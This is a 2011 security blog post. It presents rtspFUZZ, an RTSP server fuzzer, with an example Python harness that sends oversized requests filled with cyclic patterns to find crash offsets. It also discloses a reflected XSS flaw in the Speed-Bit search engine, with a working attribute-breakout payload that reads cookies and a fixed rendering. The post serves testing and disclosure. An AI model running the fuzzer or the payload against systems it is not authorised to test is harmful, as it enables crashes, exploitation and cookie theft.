Sunday, November 20, 2011

rtspFUZZ a Real Time Streaming Server Fuzzer

The Real Time Streaming Protocol (RTSP) is an application-level network control protocol, used in entertainment and communications systems, for controlling the delivery of data with real-time properties. It provides an extensible framework for controlled, on-demand delivery of real-time data such as audio and video: the client sends text commands (OPTIONS, DESCRIBE, SETUP, PLAY, PAUSE, TEARDOWN and so on) in an HTTP-like request format, and the server answers with a status line and headers. That text framing is what makes the protocol a natural target for request-crafting fuzzers.

rtspFUZZ is a Real Time Streaming Protocol server fuzzer (a Python script of roughly 600 lines) that I wrote. It tests a target server with 6 basic and 9 advanced request-crafting techniques.

Key Features:
1) 6 basic crafting techniques that mutate the OPTIONS, DESCRIBE, SETUP, PLAY, GET_PARAMETER, TEARDOWN, PAUSE etc. RTSP commands, plus 9 advanced crafting techniques, to test any target application.
2) Ability to fuzz with a Metasploit pattern (pattern_create.rb), which helps find the offset of the bytes that overwrite a register or return address once the target crashes.

How to use?
1) First edit the "rtsp.conf" file with your favourite text editor and change the parameters as required; each parameter is described in the configuration file.
2) Give write permission on LOG.TXT (chmod 777 LOG.TXT; chmod u+w LOG.TXT is enough if you run the fuzzer as the file's owner).
3) Give execution permission to the "" file (chmod 777
4) In a shell type "python". The script prints the preferences it read from the configuration file; if they are correct, press Enter to start fuzzing.
5) The program always saves the last successful request in the LOG.TXT file. When the target crashes, open LOG.TXT to check the buffer length and the exact request that was sent; the request that actually crashed the target is the one sent after it, so that is the length and technique to reproduce the crash with.
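The following is an added example, not the rtspFUZZ code itself, showing the mechanics the steps above rely on: building RTSP/1.0 requests, filling one field per request with a Metasploit-style cyclic pattern, keeping the last answered request as LOG.TXT does, and mapping a crash value back to an offset the way pattern_offset.rb does. The target URL 192.0.2.10:554, the header set, the buffer sizes and the offline stand-in server with a 1500-byte buffer are all assumptions for illustration.

```python
"""Added example: minimal RTSP request crafter and fuzz harness (not rtspFUZZ)."""
import io
import socket
import string

RTSP_METHODS = ["OPTIONS", "DESCRIBE", "SETUP", "PLAY", "PAUSE",
                "GET_PARAMETER", "TEARDOWN"]


def cyclic_pattern(length):
    """Same sequence as Metasploit's pattern_create.rb (Aa0Aa1Aa2...Zz9): every
    4-byte window is unique, so a register overwritten with it gives the offset."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)                      # 20280 bytes, the pattern's maximum


def pattern_offset(value, pattern_length=20280):
    """pattern_offset.rb equivalent: locate a crash value in the pattern.
    Accepts the 4 ASCII bytes or a 32-bit register value (little-endian)."""
    if isinstance(value, int):
        value = value.to_bytes(4, "little").decode("ascii")
    return cyclic_pattern(pattern_length).find(value)


def build_request(method, url, cseq, headers=None, body=b""):
    """Assemble an RTSP/1.0 request: request line, CSeq, headers, blank line."""
    lines = ["%s %s RTSP/1.0" % (method, url), "CSeq: %d" % cseq]
    for name, value in (headers or {}).items():
        lines.append("%s: %s" % (name, value))
    if body:
        lines.append("Content-Length: %d" % len(body))
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1") + body


def basic_cases(url, lengths=(256, 512, 1024, 2048)):
    """'Basic crafting': one oversized field per request, for every method and a
    growing buffer, filled with the cyclic pattern. Yields (label, request)."""
    for length in lengths:
        fill = cyclic_pattern(length)
        for method in RTSP_METHODS:
            yield (method, "url", length), build_request(method, url + fill, 1)
            for header in ("User-Agent", "Session", "Transport"):   # assumed set
                yield (method, header, length), build_request(method, url, 1, {header: fill})


def run_fuzz(cases, send, log):
    """Send each case; overwrite `log` with the last request that was answered
    (the LOG.TXT workflow). Returns (crash_label, crash_request, last_ok) when
    the target stops answering, or None if every case got a reply."""
    last_ok = None
    for label, request in cases:
        try:
            send(request)
        except OSError:                      # reset, refused, timeout: target is gone
            return label, request, last_ok
        last_ok = (label, request)
        log.seek(0)
        log.truncate()
        log.write(b"# buffer length %d, case %s\r\n" % (len(request), repr(label).encode("ascii")))
        log.write(request)
    return None


def tcp_sender(host, port, timeout=3.0):
    """Real transport: one TCP connection per request; an empty read counts as a crash."""
    def send(request):
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(request)
            reply = sock.recv(4096)
            if not reply:
                raise ConnectionError("server closed the connection without a reply")
            return reply
    return send


def fake_target(max_len):
    """Constructed stand-in for a server with a fixed-size request buffer, so the
    example runs offline: it drops the connection for anything above max_len."""
    def send(request):
        if len(request) > max_len:
            raise ConnectionResetError("target crashed")
        return b"RTSP/1.0 200 OK\r\nCSeq: 1\r\n\r\n"
    return send


def demo(max_len=1500):
    """Run the basic cases against the constructed target; returns (result, log)."""
    log = io.BytesIO()
    result = run_fuzz(basic_cases("rtsp://192.0.2.10:554/stream"), fake_target(max_len), log)
    return result, log


if __name__ == "__main__":
    result, log = demo()
    crash_label, crash_request, last_ok = result
    print("crashed on", crash_label, "after last good case", last_ok[0])
    print("LOG.TXT would start with:", log.getvalue()[:32])
    # A debugger showing EIP=0x41326141 means the bytes 'Aa2A' landed in it;
    # pattern_offset tells you how far into the fill those bytes sit.
    print("offset of EIP 0x41326141 in the pattern:", pattern_offset(0x41326141))
```

To run against a live server, replace fake_target(...) in demo() with tcp_sender(host, 554); the log then holds the last request the server answered, and the case returned by run_fuzz is the one to replay.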

Some sample Wireshark captures:


The tool can be downloaded from:

XSS through JavaScript injection in Speed-Bit Search Engine

There is an XSS (JavaScript injection) vulnerability in the home page of the Speed-Bit search engine.

In Media:
The Hackers News:
Softpedia News:

Technical description of this issue:
The XSS filter strips normal HTML tags (<script>, <iframe> and the like), but the search term is reflected inside a quoted attribute of a hyperlink without encoding the double quote. A payload that closes the attribute and appends a JavaScript event-handler attribute (onmousemove in the PoC below; onmouseover works the same way) therefore passes the filter, and the script runs as soon as the mouse touches the link.

Proof of concept:
To reproduce this vulnerability, follow these steps:

1) Visit this URL" onmousemove="alert(document.cookie)

2) Move the mouse cursor over the hyperlink shown in the attached PoC screenshot; a pop-up box showing the browser's cookies for the site appears.
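The following is an added example, not Speed-Bit's code, of the bug class behind this issue: a tag blacklist that leaves quotes alone, a hypothetical search page that reflects the term into a link, the hardened version that encodes for the attribute and text contexts, and a small parser-based check that lists any on* handler the browser would actually see. The page template, the /search?q= link and the blacklist contents are assumptions.

```python
"""Added example: attribute-breakout XSS past a tag blacklist, and the fix."""
import html
import re
from html.parser import HTMLParser
from urllib.parse import quote_plus

# A filter of the kind described in the advisory: removes whole dangerous tags,
# nothing else (assumed tag list).
TAG_BLACKLIST = re.compile(r"</?\s*(script|iframe|object|embed)[^>]*>", re.IGNORECASE)


def naive_filter(term):
    return TAG_BLACKLIST.sub("", term)


def render_vulnerable(term):
    """Reflects the filtered term into a quoted attribute and the link text
    without encoding quotes, so a leading " closes the attribute early."""
    term = naive_filter(term)
    return '<a href="/search?q=%s">Search again for %s</a>' % (term, term)


def render_safe(term):
    """Encode per context: URL-encode the query value, then HTML-encode it
    (quote=True maps " to &quot;), and HTML-encode the text node."""
    in_href = html.escape(quote_plus(term), quote=True)
    in_text = html.escape(term, quote=True)
    return '<a href="/search?q=%s">Search again for %s</a>' % (in_href, in_text)


class HandlerFinder(HTMLParser):
    """Collects every on* attribute a browser would treat as an event handler."""

    def __init__(self):
        super().__init__()
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        for name, _value in attrs:
            if name.startswith("on"):
                self.handlers.append((tag, name))


def injected_handlers(markup):
    """Parse the markup the way a browser would and return (tag, attr) pairs."""
    finder = HandlerFinder()
    finder.feed(markup)
    finder.close()
    return finder.handlers


PAYLOAD = '" onmousemove="alert(document.cookie)'   # the advisory's payload

if __name__ == "__main__":
    for render in (render_vulnerable, render_safe):
        markup = render(PAYLOAD)
        print(render.__name__, "->", markup)
        print("   event handlers seen by the parser:", injected_handlers(markup))
```

The check relies on a real HTML parser rather than a regex because the browser's tokenizer, not the filter's idea of a tag, decides what becomes an attribute; that is exactly the gap the blacklist leaves open.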

The search engine might not be as popular as Google, but a large number of users could be affected if a black hat were to profit from the flaw.